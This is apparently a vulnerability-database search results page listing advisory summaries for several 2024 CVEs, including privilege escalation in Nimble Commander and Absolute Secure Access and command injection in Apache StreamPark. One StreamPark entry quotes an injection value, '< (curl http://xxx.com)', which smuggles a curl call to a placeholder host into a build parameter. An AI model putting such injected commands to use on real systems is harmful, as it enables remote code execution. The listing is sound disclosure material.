Lucene search
K

832 matches found

Vulnrichment
Vulnrichment
added 2024/07/26 11:26 a.m.27 views

CVE-2024-7062 Local Privilege Escalation in Nimble Commander <= v1.6.0, Build 4087

Nimble Commander suffers from a privilege escalation vulnerability due to the server info.filesmanager.Files.PrivilegedIOHelperV2 performing improper/insufficient validation of a client’s authorization before executing an operation. Consequently, it is possible to execute system-level commands as...

8.8CVSS7.8AI score0.00246EPSS
Exploits1References1
CVE
CVE
added 2024/07/26 11:26 a.m.73 views

CVE-2024-7062

CVE-2024-7062 affects Nimble Commander. The vulnerability is located in the server component info.filesmanager.Files.PrivilegedIOHelperV2 and arises from improper/insufficient validation of a client’s authorization before executing an operation. As described in the connected documents, this can e...

8.8CVSS9.2AI score0.00246EPSS
Exploits1References1Affected Software1
NVD
NVD
added 2024/07/25 5:15 p.m.17 views

CVE-2024-40872

There is an elevation of privilege vulnerability in server and client components of Absolute Secure Access prior to version 13.07. Attackers with local access and valid desktop user credentials can elevate their privilege to system level by passing invalid address data to the vulnerable component...

8.4CVSS0.00156EPSS
Exploits0References1
Vulnrichment
Vulnrichment
added 2024/07/25 5:0 p.m.15 views

CVE-2024-40872 Elevation of privilege in Absolute Secure Access clients and servers

There is an elevation of privilege vulnerability in server and client components of Absolute Secure Access prior to version 13.07. Attackers with local access and valid desktop user credentials can elevate their privilege to system level by passing invalid address data to the vulnerable component...

8.4CVSS6.7AI score0.00156EPSS
Exploits0References1
Cvelist
Cvelist
added 2024/07/25 5:0 p.m.39 views

CVE-2024-40872 Elevation of privilege in Absolute Secure Access clients and servers

There is an elevation of privilege vulnerability in server and client components of Absolute Secure Access prior to version 13.07. Attackers with local access and valid desktop user credentials can elevate their privilege to system level by passing invalid address data to the vulnerable component...

8.4CVSS0.00156EPSS
Exploits0References1
CVE
CVE
added 2024/07/25 5:0 p.m.46 views

CVE-2024-40872

CVE-2024-40872 describes an elevation-of-privilege flaw in Absolute Secure Access, affecting server and client components before version 13.07. Attackers with local access and valid desktop credentials can pass invalid address data to a vulnerable component to manipulate tokens and elevate a norm...

8.4CVSS8.2AI score0.00156EPSS
Exploits0References1
Positive Technologies
Positive Technologies
added 2024/07/25 12:0 a.m.3 views

PT-2024-29123 · Unknown · Absolute Secure Access

Name of the Vulnerable Software and Affected Versions: Absolute Secure Access versions prior to 13.07 Description: The issue is related to an elevation of privilege vulnerability in server and client components. Attackers with local access and valid desktop user credentials can elevate their...

8.4CVSS7AI score0.00156EPSS
Exploits0References4
Veracode
Veracode
added 2024/07/18 5:38 a.m.15 views

Command Injection

org.apache.streampark:streampark is vulnerable to Command Injection. The vulnerability is caused due to insufficient input parameter validation, allowing attackers to insert commands. Exploiting this requires system-level access via user login, thereby limiting its risk due to controlled user...

8.8CVSS7.3AI score0.01607EPSS
Exploits0References2Affected Software1
OSV
OSV
added 2024/07/17 9:30 a.m.9 views

GHSA-5V69-92VW-FMJH Apache StreamPark: maven build params could trigger remote command execution

In streampark, the project module integrates Maven's compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and...

4.7CVSS5.3AI score0.01117EPSS
Exploits0References4
OSV
OSV
added 2024/07/17 9:15 a.m.20 views

CVE-2024-29737

In streampark, the project module integrates Maven's compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and...

4.7CVSS5.2AI score
Exploits0References2
NVD
NVD
added 2024/07/17 9:15 a.m.15 views

CVE-2024-29737

In streampark, the project module integrates Maven's compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and...

8.8CVSS0.01117EPSS
Exploits0References2
NVD
NVD
added 2024/07/17 9:15 a.m.48 views

CVE-2023-52291

In streampark, the project module integrates Maven's compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and...

8.8CVSS0.01607EPSS
Exploits0References2
Cvelist
Cvelist
added 2024/07/17 8:21 a.m.24 views

CVE-2024-29737 Apache StreamPark (incubating): maven build params could trigger remote command execution

In streampark, the project module integrates Maven's compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and...

0.01117EPSS
Exploits0References2
CVE
CVE
added 2024/07/17 8:21 a.m.65 views

CVE-2024-29737

CVE-2024-29737 concerns a command-injection flaw in Apache StreamPark (Project module). The vulnerability arises from lax validation of build parameters in the Maven integration, allowing an authenticated user with system-level permissions to inject commands via the Build Argument (demonstrated b...

8.8CVSS5.2AI score0.01117EPSS
Exploits0References2Affected Software1
Cvelist
Cvelist
added 2024/07/17 8:16 a.m.32 views

CVE-2023-52291 Apache StreamPark (incubating): Unchecked maven build params could trigger remote command execution

In streampark, the project module integrates Maven's compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and...

0.01607EPSS
Exploits0References2
CVE
CVE
added 2024/07/17 8:16 a.m.73 views

CVE-2023-52291

CVE-2023-52291 concerns Apache StreamPark. The vulnerability stems from lax validation of maven build parameters in the StreamPark project module, allowing command injection when the input parameter &lt; is used (for example, &lt; (curl http://xxx.com)). An attack requires the user to be logged i...

8.8CVSS5.2AI score0.01607EPSS
Exploits0References2Affected Software1
Veracode
Veracode
added 2024/07/10 7:26 a.m.27 views

Privilege Escalation

Microsoft.IO.Redist is vulnerable to Privilege Escalation. The vulnerability is due improper link resolution in the Visual Studio installer on Windows OS that allows an unprivileged user to manipulate the installation, leading to elevated SYSTEM level privileges...

7.3CVSS6.5AI score0.01292EPSS
Exploits0References2Affected Software3
BDU FSTEC
BDU FSTEC
added 2024/07/10 12:0 a.m.5 views

The vulnerability of the Windows Hyper-V hardware virtualization system allows attackers to escalate their privileges.

The vulnerability of the Windows Hyper-V hardware virtualization system is related to a numerical overflow condition. Exploiting this vulnerability can allow an attacker to elevate their privileges to the SYSTEM level...

7.8CVSS5.8AI score0.07115EPSS
Exploits0References3
CNNVD
CNNVD
added 2024/06/27 12:0 a.m.12 views

SoftMaker Office Permission License and Access Control Issues Vulnerability

Softmaker Office is a multi-platform supported office software from Softmaker, a German company. The software is used for word processing, spreadsheets, presentation design, and can also be scripted, and supports a variety of common Office file formats, as well as a variety of internal formats th...

5.3CVSS6.7AI score0.00322EPSS
Exploits1References5
Rockylinux
Rockylinux
added 2024/06/14 1:59 p.m.33 views

pcp security update

An update is available for pcp. This update affects Rocky Linux 8. A Common Vulnerability Scoring System CVSS base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list Performance Co-Pilot PCP is a suite of tools, services, and libraries for...

8.8CVSS7.2AI score0.01002EPSS
Exploits0
Rows per page
Query Builder